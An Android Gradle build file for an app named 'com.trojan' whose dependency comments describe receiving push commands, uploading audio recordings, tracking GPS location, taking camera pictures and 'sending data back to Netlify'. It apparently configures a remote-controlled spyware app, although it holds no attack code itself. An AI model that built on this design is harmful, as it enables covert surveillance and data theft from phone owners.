plugins {
    id 'com.android.application'
    id 'com.google.gms.google-services'
}

android {
    namespace 'com.trojan'
    compileSdk 34

    defaultConfig {
        applicationId "com.trojan"
        minSdk 24
        targetSdk 34
        versionCode 1
        versionName "1.0"
    }

    buildTypes {
        release {
            minifyEnabled false
            proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
        }
    }

    compileOptions {
        sourceCompatibility JavaVersion.VERSION_1_8
        targetCompatibility JavaVersion.VERSION_1_8
    }
}

dependencies {

    // --- Core Android & Google Libraries ---
    implementation 'androidx.appcompat:appcompat:1.6.1'
    implementation 'com.google.android.material:material:1.11.0' // Recommended for modern UI components

    // --- Firebase and Google Services (using the recommended BoM) ---
    implementation platform('com.google.firebase:firebase-bom:33.1.0')
    implementation 'com.google.firebase:firebase-messaging'     // For receiving push commands
    implementation 'com.google.firebase:firebase-storage'      // For uploading audio recordings
    implementation 'com.google.android.gms:play-services-location:21.2.0' // For getting GPS location

    // --- Networking ---
    implementation 'com.android.volley:volley:1.2.1'            // For sending data back to Netlify

    // ===============================================================
    // ==         NEW DEPENDENCIES FOR CAMERA & IMAGE DISPLAY       ==
    // ===============================================================

    // --- CameraX (Required for CameraActivity to take pictures) ---
    def camerax_version = "1.3.1" // Using a recent stable version
    implementation "androidx.camera:camera-core:${camerax_version}"
    implementation "androidx.camera:camera-camera2:${camerax_version}"
    implementation "androidx.camera:camera-lifecycle:${camerax_version}"
    implementation "androidx.camera:camera-view:${camerax_version}"

    // --- Glide (Required for ImageDisplayActivity to show images from a URL) ---
    implementation 'com.github.bumptech.glide:glide:4.16.0'

}
